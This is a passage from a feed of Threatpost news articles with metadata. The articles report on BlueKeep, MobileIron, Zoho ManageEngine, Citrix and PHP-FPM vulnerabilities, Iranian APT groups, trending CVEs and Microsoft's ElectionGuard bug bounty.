spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). \u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-26T03:52:19", "description": "Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.\n\nThe issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June, however, a proof of concept (PoC) [exploit became available](<https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505>) in September. Since then, both hostile state actors and cybercriminals have attempted to exploit the flaw in the U.K., according to a new advisory by the National Cyber Security Centre (NCSC).\n\n\u201cThese actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting,\u201d said the NCSC [in an advisory this week](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>). \u201cIn some cases, when the latest updates are not installed, they have successfully compromised systems.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe NCSC said that the healthcare, local government, logistics and legal sectors have all been targeted \u2013 but others could also be affected.\n\nSeparately, the Cybersecurity and Infrastructure Security Agency (CISA) [in October warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) APT groups are exploiting the MobileIron flaw in combination with the severe Microsoft Windows [Netlogon/Zerologon vulnerability](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) (CVE-2020-1472).\n\n## **The Flaw**\n\nThe flaw, first reported to MobileIron by Orange Tsai from DEVCORE, could allow an attacker to execute remote exploits without authentication.\n\nMobileIron provides a platform that allows enterprises to manage the end-user mobile devices across their company. The flaw exists across various components of this platform: In MobileIron Core, a component of the MobileIron platform that serves as the administrative console; and in MobileIron Connector, a component that adds real-time connectivity to the backend. Also impacted is Sentry, an in-line gateway that manages, encrypts and secures traffic between the mobile-device and back-end enterprise systems; and Monitor and Reporting Database, which provides comprehensive performance management functionality.\n\nThe bug affects Core and Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.\n\n## **Patches**\n\nMobileIron, for its part, said in an update this week that it has been engaging in \u201cproactive outreach to help customers secure their systems,\u201d and estimates that 90 to 95 percent of all devices are now managed on patched/updated versions of software.\n\nWhile the company said it will continue to follow up with the remaining customers where we can determine that they have not yet patched affected products, it strongly urges companies to make sure they are updated.\n\n\u201cMobileIron strongly recommends that customers apply these patches and any security updates as soon as possible,\u201d said the company in its [security update.](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\nThreatpost has reached out to MobileIron for further comment.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _****_[FREE Threatpost webinar](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ on _****_Dec. 16 at 2 p.m. ET. _****_Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from world-class security experts on new kinds of attacks, the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _****_[Register here](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ for the Wed., Dec. 16 for this _****_LIVE webinar_****_._**\n", "cvss3": {}, "published": "2020-11-25T16:55:48", "type": "threatpost", "title": "Critical MobileIron RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15505"], "modified": "2020-11-25T16:55:48", "id": "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "href": "https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:24:12", "description": "As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing \u201cend-to-end verification of elections.\u201d\n\nElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted.\n\nThe bounty program invites security researchers (\u201cwhether full-time cybersecurity professionals, part-time hobbyists or students\u201d) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). Eligible submissions with a \u201cclear, concise proof of concept\u201d (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren\u2019t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages).\n\nThe program is one prong of the company\u2019s wider \u201cDefending Democracy\u201d program, under which Microsoft has pledged to [protect campaigns from hacking](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>); increase political [advertising transparency](<https://threatpost.com/google-fine-privacy-gdpr/141055/>) online; explore ways to [protect electoral processes](<https://threatpost.com/voting-machines-hacked-with-ease-at-def-con/127101/>) with technology; and defend against [disinformation campaigns](<https://threatpost.com/twitter-5000-accounts-disinformation-campaigns/145764/>).\n\nResearchers said that the bug-bounty program is a welcome \u2013 if limited \u2013 addition to the private sector\u2019s response to election meddling. However, they also highlighted the need for a more holistic effort, united across both public and private organizations.\n\n\u201c[Russian interference in the 2016 election](<https://threatpost.com/justice-department-indicts-12-russian-nationals-tied-to-2016-election-hacking/133978/>) gave cybersecurity a quick moment in the political spotlight,\u201d Monique Becenti, product and channel specialist at SiteLock, told Threatpost. \u201cBut when the cost of cybercrime reaches billions of dollars each year, election security needs to be top of mind for our political leaders. Since 2016, election security bills have been slow-moving. Some companies, like Microsoft, are rallying the security industry to address this issue head-on. The ElectionGuard Bounty program is an important step in the right direction, but we need political leaders who will champion this issue and ensure constituents and our elections stay secure.\u201d\n\nNot everyone is excited about the move; Richard Gold, head of security engineering at Digital Shadows, said that the program is limited to Microsoft\u2019s proprietary solution, which makes its real-world impact limited at best.\n\n\u201cIt\u2019s great that companies like Microsoft are launching programs like this, but the question remains: how much is this kind of bug bounty going to be used?\u201d he told Threatpost. \u201cBug-bounty programs need to be applied consistently in order to have real impact. There is a trade off in time and resources that needs to be overcome in order for a program like this to be worthwhile.\u201d\n\n\u201cMicrosoft is committed to strengthening our partnership with the security research community as well as pursuing new areas for security improvement in emerging technology,\u201d said Jarek Stanley, senior program manager at the Microsoft Security Response Center, in [announcing the program](<https://msrc-blog.microsoft.com/2019/10/18/introducing-the-electionguard-bounty-program/>). \u201cWe look forward to sharing more bounty updates and improvements in the coming months.\u201d\n\nMicrosoft paid $4.4 million in bounty rewards between July 1, 2018 and June 30 across 11 bounty programs, with a top award of $200,000.\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-18T20:04:29", "type": "threatpost", "title": "Microsoft Tackles Election Security with Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-18T20:04:29", "id": "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "href": "https://threatpost.com/microsoft-election-security-bug-bounties/149347/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:57", "description": "Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the networking vendor announced Tuesday. Four of the bugs are exploitable by an unauthenticated, remote attacker.\n\nThe Citrix products (formerly known as NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to a December assessment from Positive Technologies.\n\nOther flaws announced Tuesday also affect Citrix SD-WAN WANOP appliances, models 4000-WO, 4100-WO, 5000-WO and 5100-WO.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks on the management interface of the products could result in system compromise by an unauthenticated user on the management network; or system compromise through cross-site scripting (XSS). Attackers could also create a download link for the device which, if downloaded and then executed by an unauthenticated user on the management network, could result in the compromise of a local computer.\n\n\u201cCustomers who have configured their systems in accordance with [Citrix recommendations](<https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html>) [i.e., to have this interface separated from the network and protected by a firewall] have significantly reduced their risk from attacks to the management interface,\u201d according to the vendor.\n\nThreat actors could also mount attacks on Virtual IPs (VIPs). VIPs, among other things, are used to provide users with a unique IP address for communicating with network resources for applications that do not allow multiple connections or users from the same IP address.\n\nThe VIP attacks include denial of service against either the Gateway or Authentication virtual servers by an unauthenticated user; or remote port scanning of the internal network by an authenticated Citrix Gateway user.\n\n\u201cAttackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\u201d according to the critical [Citrix advisory](<https://support.citrix.com/article/CTX276688>). \u201cCustomers who have not enabled either the Gateway or Authentication virtual servers are not at risk from attacks that are applicable to those servers. Other virtual servers e.g. load balancing and content switching virtual servers are not affected by these issues.\u201d\n\nA final vulnerability has been found in Citrix Gateway Plug-in for Linux that would allow a local logged-on user of a Linux system with that plug-in installed to elevate their privileges to an administrator account on that computer, the company said.\n\nOf the 11 vulnerabilities, there are six possible attacks routes; but five of those have barriers to exploitation. Also, the latest patches fully resolve all the issues. Here\u2019s a full list of the bugs with exploitation barriers listed:\n\n\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, a compromise could easily be used as a foothold to move laterally across a victim organization. However, Citrix CISO Fermin Serna said in an accompanying [blog post](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that the company isn\u2019t aware of any active exploitation of the issues so far, and he stressed that the barriers to exploitation of these flaws are significant.\n\n\u201cThere are barriers to many of these attacks; in particular, for customers where there is no untrustworthy traffic on the management network, the remaining risk reduces to a denial-of-service attack,\u201d he wrote. \u201cAnd in that case, only when Gateway or authentication virtual servers are being used. Other virtual servers, for example, load balancing and content switching virtual servers, are not affected by the issue.\u201d\n\nHe added, \u201cthree possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\u201d\n\nSerna also noted that the bugs aren\u2019t related to the CVE-2019-19781 critical bug in Citrix ADC and Gateway, [announced in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>). That zero-day flaw [remained unpatched](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) for almost a month and in-the-wild attacks [followed](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>).\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-07T14:44:30", "type": "threatpost", "title": "Citrix Bugs Allow Unauthenticated Code Injection, Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-07T14:44:30", "id": "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "href": "https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-06T21:57:01", "description": "A buffer underflow bug in PHP could allow remote code-execution (RCE) on targeted NGINX servers.\n\nFirst discovered during a hCorem Capture the Flag competition in September, the bug (CVE-2019-11043) exists in the FastCGI directive used in some PHP implementations on NGINX servers, according to researchers at Wallarm.\n\nPHP powers about 30 percent of modern websites, including popular web platforms like WordPress and Drupal \u2013 but NGINX servers are only vulnerable if they have PHP-FPM enabled (a non-default optimization feature that allows servers to execute scripts faster). The issue [is 